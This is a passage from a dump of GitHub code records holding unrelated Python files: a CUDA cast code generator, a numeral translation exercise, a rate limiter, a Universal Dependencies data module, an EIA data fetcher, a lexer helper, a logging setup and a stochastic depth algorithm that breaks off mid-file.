N_THREADS_PER_BLOCK));\n cast_op<<>>(\n reinterpret_cast<{{output_type}}*>(output),\n reinterpret_cast(input),\n n_elements\n );\n}\n \"\"\"\n)\n\nCAST_FUNCS = {\n \"bool\": {\n \"half\": \"(half)input[idx];\",\n \"float\": \"(float)input[idx];\",\n \"bfloat16\": \"(bfloat16)input[idx];\",\n },\n \"half\": {\n \"bfloat16\": \"__float2bfloat16_rn(__half2float(input[idx]));\",\n \"float\": \"__half2float(input[idx]);\",\n },\n \"bfloat16\": {\n \"half\": \"__float2half_rn(__bfloat162float(input[idx]));\",\n \"float\": \"__bfloat162float(input[idx]);\",\n },\n \"float\": {\n \"bfloat16\": \"__float2bfloat16_rn(input[idx]);\",\n \"half\": \"__float2half_rn(input[idx]);\",\n },\n}\n\n\n@registry.reg(\"cuda.cast.gen_function\")\ndef gen_function(func_attrs: Dict[str, Any]) -> str:\n input_ = func_attrs[\"inputs\"][0]\n output = func_attrs[\"outputs\"][0]\n backend_spec = CUDASpec()\n output_dtype = output.dtype()\n output_type = backend_spec.dtype_to_backend_type(output_dtype)\n input_type = backend_spec.dtype_to_backend_type(input_.dtype())\n cast_func_call = CAST_FUNCS[input_type][output_type]\n\n return FUNC_TEMPLATE.render(\n header_files=backend_spec.header_src_template.render(\n extra_header=CUDA_HEADER_FILES\n ),\n constant=CONSTANT_TEMPLATE.render(),\n func_name=func_attrs[\"name\"],\n input_type=input_type,\n output_type=output_type,\n index_type=backend_spec.index_type,\n cast_func_call=cast_func_call,\n prefix=backend_spec.prefix,\n )\n\n\n@registry.reg(\"cuda.cast.func_decl\")\ndef gen_function_decl(func_attrs: Dict[str, Any]) -> str:\n backend_spec = CUDASpec()\n return FUNC_DECL_TEMPLATE.render(\n func_name=func_attrs[\"name\"],\n prefix=backend_spec.prefix,\n index_type=backend_spec.index_type,\n )\n\n\n@registry.reg(\"cuda.cast.func_call\")\ndef gen_function_call(func_attrs: Dict[str, Any], indent=\" \") -> str:\n backend_spec = CUDASpec()\n return FUNC_CALL_TEMPLATE.render(\n func_name=func_attrs[\"name\"],\n output=func_attrs[\"outputs\"][0]._attrs[\"name\"],\n input=func_attrs[\"inputs\"][0]._attrs[\"name\"],\n calculate_n=gen_int_var_product_str(func_attrs[\"inputs\"][0].shape()),\n index_type=backend_spec.index_type,\n indent=indent,\n )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/cuda/tensor/cast.py","file_name":"cast.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"8835631874","text":"# 4. Соз��ать (не программно) текстовый файл со следующим содержимым:\n# One — 1\n# Two — 2\n# Three — 3\n# Four — 4\n# Необходимо написать программу, открывающую файл на чтение и считывающую построчно данные.\n# При этом английские числительные должны заменяться на русские.\n# Новый блок строк должен записываться в новый текстовый файл.\n\ndictionary = {}\nwith open('dictionary.txt', \"r\", encoding='utf-8') as fdictionary:\n for line in fdictionary:\n dictionary[line.replace('\\n', '').split(\":\")[0]] = line.replace('\\n', '').split(\":\")[1]\n\ninput_file = open('text_4.txt', \"r\", encoding='utf-8')\noutput_file = open('task_04_output.txt', \"w\", encoding='utf-8')\n\nwhile True:\n line = input_file.readline()\n if line == '': break\n translated_line = \"\"\n i = 0\n\n for word in line.replace('\\n', ' \\n').split(\" \"):\n i += 1\n try:\n if word.istitle():\n translated_word = dictionary[word.lower()].title()\n else:\n translated_word = dictionary[word.lower()]\n except KeyError:\n translated_word = word\n\n translated_line = translated_line + translated_word\n\n if i < len(line.replace('\\n', '').split(\" \")): translated_line = translated_line + \" \"\n\n output_file.write(translated_line)\n\ninput_file.close()\noutput_file.close()\n","repo_name":"ahelmut/geekbrains_exercise","sub_path":"lesson05/task_04.py","file_name":"task_04.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632543007","text":"import threading\n\nfrom Design_patterns.RateLimiter.slidingWindow.sliding_window import SlidingWindow\n\n\nclass UserBucketCreator:\n def __init__(self, id):\n self.bucket = {id: SlidingWindow(1, 10)}\n\n def access_application(self, thread_id, id):\n if self.bucket.get(id).grant_access():\n print(f\"{thread_id} -> able to access the application\")\n else:\n print(f\"{thread_id} -> Too many requests, Please try after some time\")\n","repo_name":"jameeluddin/Low-level-Design","sub_path":"Design_patterns/RateLimiter/slidingWindow/user_bucket_creator.py","file_name":"user_bucket_creator.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158134498","text":"import os\nfrom argparse import ArgumentParser\nfrom typing import Any, Callable, Dict, List, Tuple, Optional\nimport random\n\nfrom datasets import load_dataset, load_from_disk\nfrom torch import LongTensor\nfrom torch.utils.data import DataLoader\nfrom datasets.arrow_dataset import Dataset\nfrom transformers import BatchEncoding\n\nfrom infoshare.datamodules.base import BaseDataModule\n\n\nclass UDDataModule(BaseDataModule):\n @staticmethod\n def add_model_specific_args(parent_parser: ArgumentParser) -> ArgumentParser:\n parser = parent_parser.add_argument_group(\"Universal Dependencies\")\n parser.add_argument(\n \"--treebank_name\",\n type=str,\n default=\"en_gum\",\n help=\"The name of the treebank to use as the dataset.\",\n )\n parser.add_argument(\n \"--control_task\",\n default=False,\n action=\"store_true\",\n help=\"Flag to enable selectivity control task.\",\n )\n return parent_parser\n\n # Declare variables that will be initialized later\n ud_train: Dataset\n ud_val: Dataset\n ud_test: Dataset\n ud_debug: Dataset\n cname_to_id: Optional[Dict[str, int]]\n id_to_cname: List[str]\n num_classes: int\n\n def __init__(\n self,\n task: str,\n treebank_name: str,\n tokenize_fn: Callable,\n data_dir: str = \"./data\",\n batch_size: int = 64,\n num_workers: int = 4,\n control_task: bool = False,\n ):\n \"\"\"Data module for the Universal Dependencies framework.\n\n Args:\n task (str): the task to train the probing classifier on (either POS or DEP).\n treebank_name (str): the name of the treebank to use as the dataset\n tokenize_fn (Callable): a function that takes a sentence and returns a list of tokens\n data_dir: (str): the data directory to load/store the datasets\n batch_size (int): the batch size used by the dataloaders\n num_workers (int): the number of subprocesses used by the dataloaders\n control_task (bool): Whether to process the labels for the selectivity\n control task.\n \"\"\"\n super().__init__()\n self.save_hyperparameters(ignore=[\"tokenize_fn\"])\n\n valid_tasks = [\"POS\", \"DEP\"]\n assert task in valid_tasks, f\"Task must be one of {valid_tasks}.\"\n\n self.tokenize_fn = tokenize_fn\n self.dataset_dir = os.path.join(data_dir, treebank_name)\n\n if self.hparams.control_task:\n self.token_to_control_id = {}\n\n def prepare_data(self):\n if os.path.exists(self.dataset_dir):\n print(\"Dataset already downloaded.\")\n return\n\n print(\"Downloading UniversalDependencies data from HuggingFace\")\n dataset = load_dataset(\"universal_dependencies\", self.hparams.treebank_name)\n\n # Only keep columns that are relevant to our tasks\n keep_columns = [\"tokens\", \"upos\", \"head\", \"deprel\"]\n\n # Remove tokens that correspond to the underscore class.\n # The UniversalDependencies dataset essentially splits compound words into their parts\n # but keeps the original token in the list of tokens as well. This will cause problems\n # when we try to parse the sentences, especially for dependency relations which is\n # affected by the word order as the \"head\" value is a token index.\n def remove_underscores(x: Dict[str, list]) -> Dict[str, list]:\n keep_indices = [\n idx for idx, value in enumerate(x[\"head\"]) if value != \"None\"\n ]\n for column in keep_columns:\n x[column] = [x[column][idx] for idx in keep_indices]\n\n return x\n\n drop_columns = set(dataset[\"train\"].column_names).difference(keep_columns)\n dataset = dataset.map(remove_underscores, remove_columns=list(drop_columns))\n\n # Handle the \"head\" features being a string instead of an int and some \"deprel\" features\n # having a language-specific relation modifier.\n def handle_dep_features(x: Dict[str, list]) -> Dict[str, list]:\n x[\"head\"] = [int(value) for value in x[\"head\"]]\n x[\"deprel\"] = [value.split(\":\")[0] for value in x[\"deprel\"]]\n return x\n\n dataset = dataset.map(handle_dep_features)\n\n print(\"Saving to disk\")\n dataset.save_to_disk(self.dataset_dir)\n\n def setup(self, stage: Optional[str] = None):\n dataset = load_from_disk(self.dataset_dir)\n\n if stage == \"fit\" or stage is None:\n self.ud_train = dataset[\"train\"]\n self.ud_val = dataset[\"validation\"]\n\n if self.hparams.task == \"POS\":\n self.id_to_cname = self.ud_train.info.features[\"upos\"].feature.names\n self.num_classes = self.ud_train.info.features[\n \"upos\"\n ].feature.num_classes\n self.cname_to_id = {k: i for i, k in enumerate(self.id_to_cname)}\n if self.hparams.control_task:\n random.seed(99)\n self.ud_train = self.ud_train.map(self._recompute_labels)\n self.ud_val = self.ud_val.map(self._recompute_labels)\n elif self.hparams.task == \"DEP\":\n # Aggregate all classes from the train dataset\n # We include \"_\" to comply with the number of classes in the dataset spec\n main_classes = sorted(set(\"_\").union(*self.ud_train[\"deprel\"]))\n # Create a mapping from class names to unique ids\n self.cname_to_id = {cname: i for i, cname in enumerate(main_classes)}\n\n self.id_to_cname = main_classes\n self.num_classes = len(main_classes)\n\n if stage == \"test\" or stage is None:\n self.ud_test = dataset[\"test\"]\n if self.hparams.control_task:\n # need training to determine the labels (if not already computed)\n self.ud_train = dataset[\"train\"]\n self.num_classes = self.ud_train.info.features[\n \"upos\"\n ].feature.num_classes\n random.seed(99)\n self.ud_train = self.ud_train.map(self._recompute_labels)\n self.ud_test = self.ud_test.map(self._recompute_labels)\n\n if stage == \"debug\" or stage is None:\n self.ud_debug = dataset[\"validation\"].select(list(range(50)))\n\n def _recompute_labels(self, sample: Dict) -> Dict:\n \"\"\"\n Recomputes the labels for the samples in the dataset based on the control task\n from Hewitt and Liang (2019).\n https://arxiv.org/abs/1909.03368\n\n We use a hardcoded seed of 99 for reproducibility.\n \"\"\"\n sample_labels = []\n for token in sample[\"tokens\"]:\n if token not in self.token_to_control_id:\n self.token_to_control_id[token] = random.randint(\n 0, self.num_classes - 1\n )\n sample_labels.append(self.token_to_control_id[token])\n sample[\"upos\"] = sample_labels\n return sample\n\n def get_collate_fn(self) -> Callable:\n \"\"\"Returns a collate function for the dataloader based on the task.\"\"\"\n if self.hparams.task == \"POS\":\n return self.pos_collate_fn\n elif self.hparams.task == \"DEP\":\n return self.dep_collate_fn\n # Add more cases here if needed\n\n def map_drels_to_ids(self, drels: List[str]) -> LongTensor:\n \"\"\"Maps a list of dependency relations to unique ids.\"\"\"\n return LongTensor([self.cname_to_id[drel] for drel in drels])\n\n def pos_collate_fn(\n self, batch: List[Dict[str, Any]]\n ) -> Tuple[BatchEncoding, List[LongTensor]]:\n \"\"\"Custom collate function for the POS task.\"\"\"\n encodings = self.tokenize_fn([x[\"tokens\"] for x in batch])\n targets = [LongTensor(x[\"upos\"]) for x in batch]\n return encodings, targets\n\n def dep_collate_fn(\n self, batch: List[Dict[str, Any]]\n ) -> Tuple[BatchEncoding, List[LongTensor], List[LongTensor]]:\n \"\"\"Custom collate function for the DEP task.\"\"\"\n encodings = self.tokenize_fn([x[\"tokens\"] for x in batch])\n heads = [LongTensor(x[\"head\"]) for x in batch]\n targets = [self.map_drels_to_ids(x[\"deprel\"]) for x in batch]\n return encodings, heads, targets\n\n def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_train,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n shuffle=True,\n drop_last=True,\n )\n\n def val_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_val,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n\n def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_test,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n\n def debug_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_debug,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n","repo_name":"thesofakillers/infoshare","sub_path":"infoshare/datamodules/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"42577937332","text":"import requests\nimport api_key\nimport pandas as pd\nkey = api_key.key # API KEY for EIA data https://www.eia.gov/opendata/register.php\n\n\n\nbase_url = 'http://api.eia.gov/category/?api_key='\nurl = base_url + key + '&category_id=321205'\n#get list of all countries\nserial_data = requests.get(url=url).json()\n\n\nlist_df = []\nlist_metadata = []\nbase_url = 'http://api.eia.gov/series/?api_key='\n# Extract export data for each country\nfor i in serial_data['category']['childseries']:\n if i['series_id'][-1] == 'M' and i['units'] == 'Thousand Barrels':\n url = base_url + key + '&series_id=' + i['series_id']\n x = requests.get(url=url).json()\n df = pd.DataFrame(x['series'][0]['data'],columns=['MonthYear','Thousand Barrels'])\n df['country'] = x['series'][0]['description']\n list_df.append(df)\n x['series'][0].pop('data')\n list_metadata.append(x['series'][0])\n\ndf_data = pd.concat(list_df)\ndf = pd.DataFrame(list_metadata)\ndf_2 = df.merge(df_data,how='inner',left_on='description',right_on='country')[['MonthYear','units','Thousand Barrels','iso3166']]\ndf_2 = df_2[df_2['iso3166'] != 'USA']\ndf_meta = pd.DataFrame(requests.get(url='https://opendata.socrata.com/resource/mnkm-8ram.json').json())\ndf_4 = df_meta.merge(df_2,left_on='alpha_3_code',right_on = 'iso3166',how='left')[['alpha_3_code','country','latitude_average','longitude_average','MonthYear','Thousand Barrels']]\ndf_4.dropna(inplace=True)\ndf_4.sort_values(by=['MonthYear','country'],inplace=True)\ndf_4['text'] = df_4['country'] + ' ' + df_4['Thousand Barrels'].astype(str) + ' Thousand Barrels'\ndf_4.to_csv('ethanol_export.csv',index=False)","repo_name":"vantaka2/ethanol_visualization","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74370486247","text":"from util import allTrue, firstFalse, isNum\nfrom enum import Enum\nfrom util import isNum, isWord\n\ndef string2Const(text : str):\n assert len(text) > 0\n \n # case 0___\n if allTrue(text, isNum) and text[0] == '0':\n return int(text)\n \n # string\n if len(text) == 3:\n return ord(text[1])\n elif len(text) >= 2:\n if text[0] == '\"' and text[-1] == '\"':\n return text[1:-1]\n \n \n return eval(text)\n\nkeyWords = [\n \"char\",\"double\",\"enum\",\"float\",\"int\",\"long\" ,\"short\" ,\"signed\",\"struct\",\"union\",\"unsign\",\"void\",\n \"for\",\"do\",\"while\",\"break\",\"if\",\"else\",\"goto\",\"switch\",\"case\",\"default\",\"return\",\n \"auto\",\"extern\",\"register\",\"static\",\"const\",\"sizeof\",\"typedef\",\"volatile\"\n] \n\nclass SymbolType(Enum):\n KeyWord = 0\n Split = 1\n Constant = 2\n Variable = 3\n Operator = 4\n #Debug = 5\n\n\ndef check_symbol_type(sym : str):\n ''' return SymbolType '''\n if type(sym) != str:\n return None\n #SymbolType.KeyWord\n if sym in keyWords:\n return SymbolType.KeyWord\n #SymbolType.Split\n if sym[0] in \"(){}[];,\":\n if len(sym) == 1:\n return SymbolType.Split\n return None\n #SymbolType.Operator\n if sym[0] in \"?!+-*/<>|&=\":\n if len(sym) == 1:\n return SymbolType.Operator \n if sym in [\"++\",\"--\",\"<<\",\">>\",\"<=\",\">=\",\"==\",\"!=\",\"&&\",\"||\",\n \"?:\",\"*=\",\"+=\",\"-=\",\"/=\",\"%=\",\"&=\",\"^=\",\"|=\",\"<<=\",\">>=\",\n \"-x\",\"++x\",\"--x\"]:\n return SymbolType.Operator\n \n if sym[0] == '-' and ((sym[1] == \".\") or isNum(sym[1])):\n pass # maybe Constant, like -.5 -0.5 -1.5\n #return SymbolType.Debug\n else:\n return None\n \n #SymbolType.Constant\n # string\n if len(sym) >= 2:\n if sym[0] == \"'\" and sym[-1] == \"'\" and len(sym) == 3:\n return SymbolType.Constant\n elif sym[0] == '\"' and sym[-1] == '\"' and len(sym) == 3:\n return None\n elif sym[0] == '\"' and sym[-1] == '\"':\n return SymbolType.Constant\n \n # number\n if sym[0] in \".-\" or isNum(sym[0]):\n # hex\n if len(sym) > 2:\n if sym[:2] in [\"0x\",\"0X\"]:\n for c in sym[2:]:\n if (not isNum(c)) and (c not in \"abcdefABCDEF\"):\n return None\n return SymbolType.Constant\n \n #float and dec\n if sym[0] == '.' and len(sym) == 1:\n return None\n start_idx = 0\n if sym[0] == '-':\n start_idx = 1\n visit_point = False\n coma_list = []\n idx_point = None\n for i,c in enumerate(sym[start_idx:]):\n if c == '.':\n if visit_point:\n return None\n visit_point = True\n coma_list.append(i)\n idx_point = i\n elif c == ',':\n coma_list.append(i)\n elif not isNum(c):\n return None\n \n # xxx,xxx,xxx case\n if idx_point == None:\n idx_point = len(sym) - start_idx\n #print(coma_list, idx_point,start_idx) \n if len(coma_list) > 0 :\n coma_list = [ n - idx_point for n in coma_list]\n \n for n in coma_list:\n if n % 4 != 0:\n return None\n \n return SymbolType.Constant\n \n #SymbolType.Variable\n if isWord(sym[0]):\n for c in sym[1:]:\n if c in \"_\":\n continue\n if (not isNum(c)) and (not isWord(c)):\n return None\n return SymbolType.Variable\n return None\n","repo_name":"AlexJhang/Syntax-","sub_path":"complier/symbolType.py","file_name":"symbolType.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8655845665","text":"import logging.config\nimport os\nfrom logging import Filter\n\nimport zcommons as zc\n\n\nclass ColorFilter(Filter):\n\n colors = {\n logging.DEBUG: zc.FORE_CYAN,\n logging.INFO: zc.FORE_GREEN,\n logging.WARN: zc.FORE_YELLOW,\n logging.WARNING: zc.FORE_YELLOW,\n logging.ERROR: zc.FORE_RED,\n logging.CRITICAL: zc.FORE_MAGENTA\n }\n\n def __init__(self):\n super(ColorFilter, self).__init__()\n\n def filter(self, record) -> bool:\n color = self.colors.get(record.levelno, None)\n if color:\n record.levelname = f\"{color}{record.levelname}{' ' * (8 - len(record.levelname))}{zc.FORE_RESET}\"\n return True\n\n\ndef logging_config(log_level=\"INFO\", log_root=\"logs\", color=True, terminal_only=False):\n if isinstance(log_level, int):\n log_level = {\n logging.DEBUG: \"DEBUG\",\n logging.INFO: \"INFO\",\n logging.WARNING: \"WARNING\",\n logging.WARN: \"WARNING\",\n logging.ERROR: \"ERROR\",\n logging.CRITICAL: \"CRITICAL\"\n }[log_level]\n log_root = os.path.abspath(log_root)\n\n handlers = {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"stream\": \"ext://sys.stdout\",\n \"filters\": [\"color\"] if color else []\n }\n }\n if not terminal_only:\n handlers.update({\n \"file\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"root.log\")\n },\n \"core\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"core.log\")\n },\n \"error\": {\n \"class\": \"logging.FileHandler\",\n \"level\": \"ERROR\",\n \"formatter\": \"common\",\n \"filename\": os.path.join(log_root, \"error.log\")\n }\n })\n\n loggers = {\n \"gfl\": {\n \"level\": log_level,\n \"handlers\": [\"console\", \"file\"] if not terminal_only else [\"console\"],\n \"propagate\": \"no\"\n }\n }\n if not terminal_only:\n loggers.update({\n \"fedflow.core\": {\n \"level\": log_level,\n \"handlers\": [\"core\"],\n \"propagate\": \"yes\"\n }\n })\n\n return {\n \"version\": 1,\n \"formatters\": {\n \"common\": {\n \"format\": \"%(asctime)s %(process)5d %(name)16s [%(levelname)-5s] %(message)s\"\n }\n },\n \"filters\": {\n \"color\": {\n \"()\": ColorFilter\n }\n },\n \"handlers\": handlers,\n \"loggers\": loggers\n }\n\n\ndef update_logging_config(log_level=\"INFO\", log_root=\"logs\", color=True, terminal_only=False):\n config = logging_config(log_level, log_root, color, terminal_only)\n logging.config.dictConfig(config)\n\n\ndef set_level(log_level):\n update_logging_config(log_level=log_level)\n\n\ndef set_root(log_root):\n update_logging_config(log_root=log_root)\n\n\ndef set_color(use_color):\n update_logging_config(color=use_color)\n\n\nupdate_logging_config(terminal_only=True)\n","repo_name":"GalaxyLearning/GFL","sub_path":"gfl/runtime/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"53"} +{"seq_id":"72638570408","text":"from __future__ import annotations\n\nimport functools\nimport logging\nfrom typing import Optional, Sequence, Type, Union\n\nimport torch\nfrom torch.optim import Optimizer\nfrom torchvision.models.resnet import Bottleneck\n\nfrom composer.algorithms.stochastic_depth.sample_stochastic_layers import SampleStochasticBottleneck\nfrom composer.algorithms.stochastic_depth.stochastic_layers import StochasticBottleneck\nfrom composer.core import Algorithm, Event, State\nfrom composer.core.time import Time, TimeUnit\nfrom composer.loggers import Logger\nfrom composer.utils import module_surgery\n\nlog = logging.getLogger(__name__)\n\n_VALID_LAYER_DISTRIBUTIONS = (\"uniform\", \"linear\")\n\n_STOCHASTIC_LAYER_MAPPING = {\n 'block': {\n 'ResNetBottleneck': (Bottleneck, StochasticBottleneck)\n },\n 'sample': {\n 'ResNetBottleneck': (Bottleneck, SampleStochasticBottleneck)\n }\n}\n\n\ndef apply_stochastic_depth(model: torch.nn.Module,\n target_layer_name: str,\n stochastic_method: str = 'block',\n drop_rate: float = 0.2,\n drop_distribution: str = 'linear',\n use_same_gpu_seed: bool = True,\n optimizers: Optional[Union[Optimizer, Sequence[Optimizer]]] = None) -> torch.nn.Module:\n \"\"\"Applies Stochastic Depth (`Huang et al, 2016 `_) to the specified model.\n\n The algorithm replaces the specified target layer with a stochastic version\n of the layer. The stochastic layer will randomly drop either samples or the\n layer itself depending on the stochastic method specified. The block-wise\n version follows the original paper. The sample-wise version follows the\n implementation used for EfficientNet in the\n `Tensorflow/TPU repo `_.\n\n .. note::\n\n Stochastic Depth only works on instances of `torchvision.models.resnet.ResNet` for now.\n\n Args:\n model (torch.nn.Module): model containing modules to be replaced with stochastic versions\n target_layer_name (str): Block to replace with a stochastic block\n equivalent. The name must be registered in ``STOCHASTIC_LAYER_MAPPING``\n dictionary with the target layer class and the stochastic layer class.\n Currently, only :class:`torchvision.models.resnet.Bottleneck` is supported.\n stochastic_method (str, optional): The version of stochastic depth to use. ``\"block\"``\n randomly drops blocks during training. ``\"sample\"`` randomly drops\n samples within a block during training. Default: ``\"block\"``.\n drop_rate (float, optional): The base probability of dropping a layer or sample. Must be\n between 0.0 and 1.0. Default: `0.2``.\n drop_distribution (str, optional): How ``drop_rate`` is distributed across\n layers. Value must be one of ``\"uniform\"`` or ``\"linear\"``.\n ``\"uniform\"`` assigns the same ``drop_rate`` across all layers.\n ``\"linear\"`` linearly increases the drop rate across layer depth\n starting with 0 drop rate and ending with ``drop_rate``. Default: ``\"linear\"``.\n use_same_gpu_seed (bool, optional): Set to ``True`` to have the same layers dropped\n across GPUs when using multi-GPU training. Set to ``False`` to\n have each GPU drop a different set of layers. Only used\n with ``\"block\"`` stochastic method. Default: ``True``.\n optimizers (torch.optim.Optimizer | Sequence[torch.optim.Optimizer], optional):\n Existing optimizers bound to ``model.parameters()``.\n All optimizers that have already been constructed with\n ``model.parameters()`` must be specified here so they will optimize\n the correct parameters.\n\n If the optimizer(s) are constructed *after* calling this function,\n then it is safe to omit this parameter. These optimizers will see the correct\n model parameters.\n\n Returns:\n The modified model\n\n Example:\n .. testcode::\n\n import composer.functional as cf\n from torchvision import models\n model = models.resnet50()\n cf.apply_stochastic_depth(model, target_layer_name='ResNetBottleneck')\n \"\"\"\n _validate_stochastic_hparams(target_layer_name=target_layer_name,\n stochastic_method=stochastic_method,\n drop_rate=drop_rate,\n drop_distribution=drop_distribution)\n transforms = {}\n target_layer, stochastic_layer = _STOCHASTIC_LAYER_MAPPING[stochastic_method][target_layer_name]\n module_count = module_surgery.count_module_instances(model, target_layer)\n shared_kwargs = {'drop_rate': drop_rate, 'drop_distribution': drop_distribution, 'module_count': module_count}\n if stochastic_method == 'block':\n rand_generator = torch.Generator() # Random number generator for each layer\n stochastic_from_target_layer = functools.partial(stochastic_layer.from_target_layer,\n **shared_kwargs,\n use_same_gpu_seed=use_same_gpu_seed,\n rand_generator=rand_generator)\n elif stochastic_method == 'sample':\n stochastic_from_target_layer = functools.partial(stochastic_layer.from_target_layer, **shared_kwargs)\n else:\n raise ValueError(f\"stochastic_method {stochastic_method} is not supported.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING.keys())}\")\n transforms[target_layer] = stochastic_from_target_layer\n module_surgery.replace_module_classes(model, optimizers=optimizers, policies=transforms)\n return model\n\n\nclass StochasticDepth(Algorithm):\n \"\"\"Applies Stochastic Depth (`Huang et al, 2016 `_) to the specified model.\n\n The algorithm replaces the specified target layer with a stochastic version\n of the layer. The stochastic layer will randomly drop either samples or the\n layer itself depending on the stochastic method specified. The block-wise\n version follows the original paper. The sample-wise version follows the\n implementation used for EfficientNet in the\n `Tensorflow/TPU repo `_.\n\n Runs on :attr:`~composer.core.event.Event.INIT`, as well as\n :attr:`~composer.core.event.Event.BATCH_START` if ``drop_warmup > 0``.\n\n .. note::\n\n Stochastic Depth only works on instances of `torchvision.models.resnet.ResNet` for now.\n\n Args:\n target_layer_name (str): Block to replace with a stochastic block\n equivalent. The name must be registered in ``STOCHASTIC_LAYER_MAPPING``\n dictionary with the target layer class and the stochastic layer class.\n Currently, only :class:`torchvision.models.resnet.Bottleneck` is supported.\n stochastic_method (str, optional): The version of stochastic depth to use. ``\"block\"``\n randomly drops blocks during training. ``\"sample\"`` randomly drops\n samples within a block during training. Default: ``\"block\"``.\n drop_rate (float, optional): The base probability of dropping a layer or sample. Must be\n between 0.0 and 1.0. Default: ``0.2``.\n drop_distribution (str, optional): How ``drop_rate`` is distributed across\n layers. Value must be one of ``\"uniform\"`` or ``\"linear\"``.\n ``\"uniform\"`` assigns the same ``drop_rate`` across all layers.\n ``\"linear\"`` linearly increases the drop rate across layer depth\n starting with 0 drop rate and ending with ``drop_rate``. Default: ``\"linear\"``.\n drop_warmup (str | Time | float, optional): A :class:`Time` object, time-string, or float\n on [0.0; 1.0] representing the fraction of the training duration to linearly\n increase the drop probability to `linear_drop_rate`. Default: ``0.0``.\n use_same_gpu_seed (bool, optional): Set to ``True`` to have the same layers dropped\n across GPUs when using multi-GPU training. Set to ``False`` to\n have each GPU drop a different set of layers. Only used\n with ``\"block\"`` stochastic method. Default: ``True``.\n \"\"\"\n\n def __init__(self,\n target_layer_name: str,\n stochastic_method: str = 'block',\n drop_rate: float = 0.2,\n drop_distribution: str = 'linear',\n drop_warmup: Union[float, Time, str] = 0.0,\n use_same_gpu_seed: bool = True):\n\n if drop_rate == 0.0:\n log.warning('Stochastic Depth will have no effect when drop_rate set to 0')\n\n if stochastic_method == \"sample\" and not use_same_gpu_seed:\n log.warning('use_same_gpu_seed=false has no effect when using the \"sample\" method')\n\n self.target_layer_name = target_layer_name\n self.stochastic_method = stochastic_method\n self.drop_rate = drop_rate\n self.drop_distribution = drop_distribution\n if isinstance(drop_warmup, str):\n drop_warmup = Time.from_timestring(drop_warmup)\n if isinstance(drop_warmup, float):\n drop_warmup = Time(drop_warmup, TimeUnit.DURATION)\n self.drop_warmup = drop_warmup\n self.use_same_gpu_seed = use_same_gpu_seed\n _validate_stochastic_hparams(stochastic_method=self.stochastic_method,\n target_layer_name=self.target_layer_name,\n drop_rate=self.drop_rate,\n drop_distribution=self.drop_distribution,\n drop_warmup=str(self.drop_warmup))\n\n @property\n def find_unused_parameters(self) -> bool:\n \"\"\"DDP parameter to notify that parameters may not have gradients if it is dropped during the forward pass.\"\"\"\n\n return (self.stochastic_method == \"block\")\n\n def match(self, event: Event, state: State) -> bool:\n \"\"\"Run on :attr:`~composer.core.event.Event.INIT`, as well as\n :attr:`~composer.core.event.Event.BATCH_START` if ``drop_warmup > 0``.\n\n Args:\n event (Event): The current event.\n state (State): The current state.\n Returns:\n bool: True if this algorithm should run now.\n \"\"\"\n\n return (event == Event.INIT) or (event == Event.BATCH_START and self.drop_warmup > 0.0)\n\n def apply(self, event: Event, state: State, logger: Logger) -> Optional[int]:\n \"\"\"Applies StochasticDepth modification to the state's model.\n\n Args:\n event (Event): the current event\n state (State): the current trainer state\n logger (Logger): the training logger\n \"\"\"\n assert state.model is not None\n target_layer, stochastic_layer = _STOCHASTIC_LAYER_MAPPING[self.stochastic_method][self.target_layer_name]\n\n if event == Event.INIT:\n if module_surgery.count_module_instances(state.model, target_layer) == 0:\n log.warning(f'No {self.target_layer_name} found in model! Algorithm will function as a no-op.')\n\n apply_stochastic_depth(state.model,\n optimizers=state.optimizers,\n target_layer_name=self.target_layer_name,\n stochastic_method=self.stochastic_method,\n drop_rate=self.drop_rate,\n drop_distribution=self.drop_distribution,\n use_same_gpu_seed=self.use_same_gpu_seed)\n num_stochastic_layers = module_surgery.count_module_instances(state.model, stochastic_layer)\n logger.data_epoch({'stochastic_depth/num_stochastic_layers': num_stochastic_layers})\n\n elif event == Event.BATCH_START:\n elapsed_duration = state.get_elapsed_duration()\n assert elapsed_duration is not None, \"elapsed duration is set on BATCH_START\"\n if elapsed_duration < self.drop_warmup:\n current_drop_rate = float(elapsed_duration / self.drop_warmup) * self.drop_rate\n _update_drop_rate(state.model, stochastic_layer, current_drop_rate, self.drop_distribution)\n else:\n current_drop_rate = self.drop_rate\n logger.data_batch({'stochastic_depth/drop_rate': current_drop_rate})\n\n\ndef 